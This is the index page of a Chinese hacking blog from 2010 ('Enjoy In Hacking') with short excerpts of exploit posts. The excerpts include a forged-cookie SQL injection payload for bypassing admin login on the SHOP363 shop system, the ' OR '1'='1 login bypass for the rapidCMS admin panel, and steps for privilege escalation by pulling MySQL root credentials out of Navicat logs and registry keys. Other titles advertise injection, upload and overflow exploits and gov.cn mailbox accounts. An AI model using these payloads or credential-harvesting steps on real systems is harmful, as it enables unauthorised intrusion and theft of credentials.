凌风[0x0F]'s BloG

Enjoy In Hacking

各种GOV.CN的邮箱申请

[ At 2010-7-29 By 0x0F   0 comments ]

你们懂的。。。

Read More...

QQ2010SP1(版本号1760)有巨大漏洞

[ At 2010-7-28 By 0x0F   0 comments ]

http://hi.baidu.com/hnaker/blog/item/3ff5633d46918ff7828b1387.html

 

Read More...

SQL构造having语句暴字段

[ At 2010-7-26 By 0x0F   0 comments ]

新方法SQL注入

Read More...

利用navicat提权

[ At 2010-7-26 By 0x0F   0 comments ]

navicat是一个比较流行的MySQL管理工具,在很多服务器上都可以找到

有两个方法提权:

1、从日志文件里找密码,navicat会把操作日志(比如加账户)保存到My Documents\Navicat\MySQL\logs下的LogHistory.txt,低版本是安装目录下的logs下LogHistory.txt

2、navicat管理的MySQL服务器信息(一般是root帐户)是存在注册表里的,具体是HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers下,导出注册表导入到本机然后星号察看就OK了。。
...

Read More...

SHOP363网店系统通杀漏洞

[ At 2010-7-26 By 0x0F   0 comments ]

COOKIES欺骗,下面的是COOKIES利用代码:


Sy%5FShops=TFlags=1%2C2%2C3%2C4%2C5%2C11%2C12%_2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C21%2C22%2C31%2C32%2C33%2C34%2C35%2C36%2C37%2C41%2C42%2C43%_2C44%2C51%2C52%2C53%2C54%2C55%2C56%2C61%2C62%2C63%2C64&AdminoldFlags=1&Truename=%CE%_DE&AdminFlags=1&AdminPassword='or'='or'&AdminName='or'='or';

...Read More...

dedecms5.6注入漏洞分析与利用

[ At 2010-7-25 By 0x0F   0 comments ]

转自xhming

Read More...

马克斯CMS2.0beta (maxcms)SQL注入和管理员认证绕过漏洞

[ At 2010-7-25 By 0x0F   0 comments ]

这个系统是国内非常流行的视频点播系统,之前的1.5版本漏洞非常多,2.0版本在安全方面有所提高,但是依然有漏洞存在。

Read More...

QQPlayer 文件缓冲区溢出漏洞

[ At 2010-7-25 By 0x0F   0 comments ]
QQPlayerCUE文件缓冲区溢出漏洞...
Read More...

EZ-Oscommerce 3.1 文件上传漏洞

[ At 2010-7-25 By 0x0F   0 comments ]

EZ-Oscommerce 3.1程序针对其上传进行严格验证和过滤,可以上传任意恶意代码。google :Powered by osCommerce 或者Customized by EZ-Oscommerce

Read More...

rapidCMS V2 后台认证绕过漏洞

[ At 2010-7-25 By 0x0F   0 comments ]

rapidCMS V2 后台登录认证未经过严格过滤,导致万能密码绕过漏洞。

利用方法:

User:xxoo
Pass: ' OR '1'='1

Demo : http://site/admin.php

Read More...
分页:[«]1[2][3][4][5][6][7][»]

Powered By Z-Blog 1.8 Walle Build 100427 Code detection by Codefense


请注意:本站部分文章为网络转载,如有侵权及非法行为,请联系站长Email:web#l14of.com,谢谢合作